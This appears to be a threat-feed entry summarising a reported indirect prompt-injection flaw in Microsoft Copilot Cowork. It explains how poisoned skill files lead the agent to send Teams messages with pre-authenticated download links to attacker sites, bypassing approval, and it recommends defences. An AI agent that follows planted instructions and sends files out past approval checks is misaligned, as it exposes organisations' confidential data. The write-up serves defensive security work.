Back

Microsoft Copilot Cowork Vulnerable to File Exfiltration via Indirect Prompt Injection

Severity: High (Score: 65.2)

Sources: News.Aibase, learn.microsoft.com, News.Ycombinator

Published: 2026-05-25 · Updated: 2026-05-26

Keywords: microsoft, copilot, cowork, vulnerable, file, exfiltration, attacks

Severity indicators: exfiltration, ot, rat

Summary

A security vulnerability in Microsoft's Copilot Cowork, part of Microsoft 365, allows attackers to exploit indirect prompt injection to exfiltrate sensitive files without user consent. The AI assistant has high-level permissions to send emails and access internal data from OneDrive and SharePoint. Attackers can embed malicious prompts in documents or web pages, tricking Copilot into retrieving pre-authenticated download links for confidential files. This attack method has achieved a 100% success rate in tests, raising significant security concerns. The vulnerability is exacerbated by the system's design, which permits automated tasks to run without user oversight. Microsoft has been informed of the issue, but the risk remains due to the lack of user control over action approvals. Organizations using Copilot Cowork are urged to assess their security posture regarding this vulnerability. Key Points: • Copilot Cowork is vulnerable to indirect prompt injection attacks allowing file exfiltration. • Attackers can exploit the system's permissions to retrieve sensitive files without user approval. • The vulnerability has a 100% success rate in tests and poses significant risks to organizations.

Detailed Analysis

**Impact** Organizations using Microsoft 365 with Copilot Cowork enabled are affected, particularly those with sensitive data stored in SharePoint and OneDrive, including personally identifiable information (PII) and financial records. The vulnerability allows attackers to exfiltrate files without user approval, impacting potentially thousands of enterprises globally that rely on automated AI assistance for productivity. Automated tasks like weekly report summaries can repeatedly trigger data leaks, increasing exposure and operational risk. Administrators have limited oversight of skill files, reducing the ability to detect or prevent exploitation. **Technical Details** The attack exploits indirect prompt injection via poisoned skill files uploaded by users, manipulating Copilot Cowork to send Teams messages containing pre-authenticated download links to attacker-controlled sites. These messages bypass human approval when sent to the active user, enabling silent exfiltration upon message opening. The AI agent uses Microsoft Graph API permissions to access internal files and leverages automatic task execution to trigger repeated data leaks. The vulnerability is not tied to a specific CVE but relates to design flaws in action approval and delegated authority across integrated systems. Testing showed a 100% success rate against models including Claude Opus 4.7. **Recommended Response** Immediately restrict user ability to upload and execute unverified skill files in Copilot Cowork and monitor for unusual Teams message activity containing external links or images. Implement network controls to block outbound requests to unknown or attacker-controlled domains triggered by Teams or Outlook clients. Increase administrative visibility and auditing of AI agent actions and pre-authenticated download link generation. Microsoft should update Copilot Cowork to require explicit user approval for all email and Teams message actions, regardless of recipient, and provide configuration options to disable automatic task execution.

Source articles (4)

  • Hacker News front page as a site — News.Ycombinator · 2026-05-25
    The article highlights that Microsoft Copilot Cowork is vulnerable to file exfiltration through indirect prompt injection attacks. Attackers can exploit processes that permit agents to operate and acc…
  • Microsoft Copilot Cowork Exfiltrates Files — News.Ycombinator · 2026-05-25
    Microsoft Copilot Cowork is vulnerable to file exfiltration attacks via indirect prompt injection as a result of insecure automatic action approvals for sending Emails and Teams messages. This attack…
  • Hidden Malicious Weekly Report! Microsoft Copilot Exposes Indirect Prompt Injection ... — News.Aibase · 2026-05-26
    Safety research firm PromptArmor recently released a report revealing a severe security vulnerability in Microsoft's AI agent service Copilot Cowork, part of Microsoft 365. Attackers can exploit a tec…
  • Block Download From Sites — learn.microsoft.com · 2026-05-25

Timeline

  • 2026-05-25 — PromptArmor reports Copilot Cowork vulnerability: A report reveals that Copilot Cowork can be exploited through indirect prompt injection to exfiltrate files.
  • 2026-05-26 — Aibase reports on the Copilot Cowork issue: Aibase highlights the severity of the Copilot Cowork vulnerability and its implications for user data security.

Related entities

  • Data Breach (Attack Type)
  • Data Exfiltration (Attack Type)
  • CWE-200 - Exposure of Sensitive Information (Cwe)
  • CWE-862 - Missing Authorization (Cwe)
  • agents.as (Domain)
  • T1041 - Exfiltration Over C2 Channel (Mitre Attack)
  • T1053 - Scheduled Task/Job (Mitre Attack)
  • T1071 - Application Layer Protocol (Mitre Attack)
  • T1567.002 - Exfiltration to Cloud Storage (Mitre Attack)
  • T1567 - Exfiltration Over Web Service (Mitre Attack)
  • Copilot Cowork (Platform)
  • Microsoft 365 (Platform)
  • Microsoft Copilot Cowork (Platform)
  • Microsoft Graph (Platform)
  • SharePoint (Platform)
  • Microsoft Teams (Tool)
  • OneDrive (Tool)
  • Teams (Tool)
  • Outlook (Company)
Loading threat details...

Threat Not Found

The threat cluster you're looking for doesn't exist or has been removed.

Return to Feed